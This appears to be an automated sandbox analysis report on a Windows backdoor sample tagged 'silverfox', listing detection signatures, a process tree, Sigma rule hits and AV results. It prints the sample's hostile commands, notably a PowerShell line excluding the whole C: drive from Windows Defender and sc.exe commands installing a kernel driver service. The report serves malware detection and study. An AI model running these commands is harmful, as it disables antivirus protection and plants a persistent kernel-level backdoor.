
Windows Analysis Report
cVyexkZjrG.exe

Overview

General Information

Sample name: cVyexkZjrG.exe (renamed because original name is a hash value)
Original sample name: 5A3C5AA184E4FDB2DE4530C18ADB9B12FFC1A101C86CDE8DE13CE49D7A7A2B44.exe
Analysis ID: 1580243
MD5: 4e1927f742599f95f0d9450b4b8c2c80
SHA1: 4bd20ceb48adb224d11eae63ce6f27cb974e321b
SHA256: 5a3c5aa184e4fdb2de4530c18adb9b12ffc1a101c86cde8de13ce49d7a7a2b44
Tags: backdoor, exe, silverfox, user-zhuzhu0009

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cVyexkZjrG.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\cVyexkZjrG.exe" MD5: 4E1927F742599F95F0D9450B4B8C2C80)
    • cVyexkZjrG.tmp (PID: 6572 cmdline: "C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp" /SL5="$20428,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe" MD5: 0195248B8EBF37D072592944E7488FC4)
      • powershell.exe (PID: 1400 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 6300 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • cVyexkZjrG.exe (PID: 2464 cmdline: "C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENT MD5: 4E1927F742599F95F0D9450B4B8C2C80)
        • cVyexkZjrG.tmp (PID: 6472 cmdline: "C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp" /SL5="$40436,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENT MD5: 0195248B8EBF37D072592944E7488FC4)
          • 7zr.exe (PID: 4616 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7060 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4592 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3452 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5472 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5668 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4796 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6332 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3636 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5560 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6660 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7056 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6000 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2320 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7124 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5652 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5668 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2884 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6088 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4128 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5876 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5960 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6660 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3116 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2164 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 368 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5652 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2128 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6540 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6768 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4832 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6604 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3772 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6660 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2428 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2320 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3964 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5804 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5460 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3636 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4428 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1080 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5912 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3772 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1308 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4708 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3652 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2148 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6536 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5344 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5668 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5228 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1268 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2656 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6604 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3348 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp" /SL5="$20428,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe", ParentImage: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp, ParentProcessId: 6572, ParentProcessName: cVyexkZjrG.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 1400, ProcessName: powershell.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4592, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3452, ProcessName: sc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp" /SL5="$20428,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe", ParentImage: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp, ParentProcessId: 6572, ParentProcessName: cVyexkZjrG.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 1400, ProcessName: powershell.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4592, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3452, ProcessName: sc.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp" /SL5="$20428,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe", ParentImage: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp, ParentProcessId: 6572, ParentProcessName: cVyexkZjrG.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 1400, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: C:\Program Files (x86)\Windows NT\hrsw.vbc | ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\update.vac | ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\update.vac | ReversingLabs: Detection: 15%
Source: cVyexkZjrG.exe | Virustotal: Detection: 8%
Source: cVyexkZjrG.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: cVyexkZjrG.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb | source: 7zr.exe, 0000000D.00000003.2172723507.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2172865132.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp | Code function: 7_2_6CC4AEC0 FindFirstFileA,FindClose,FindClose,7_2_6CC4AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00B36868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00B36868
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00B37496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00B37496
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://ocsp.digicert.com0H
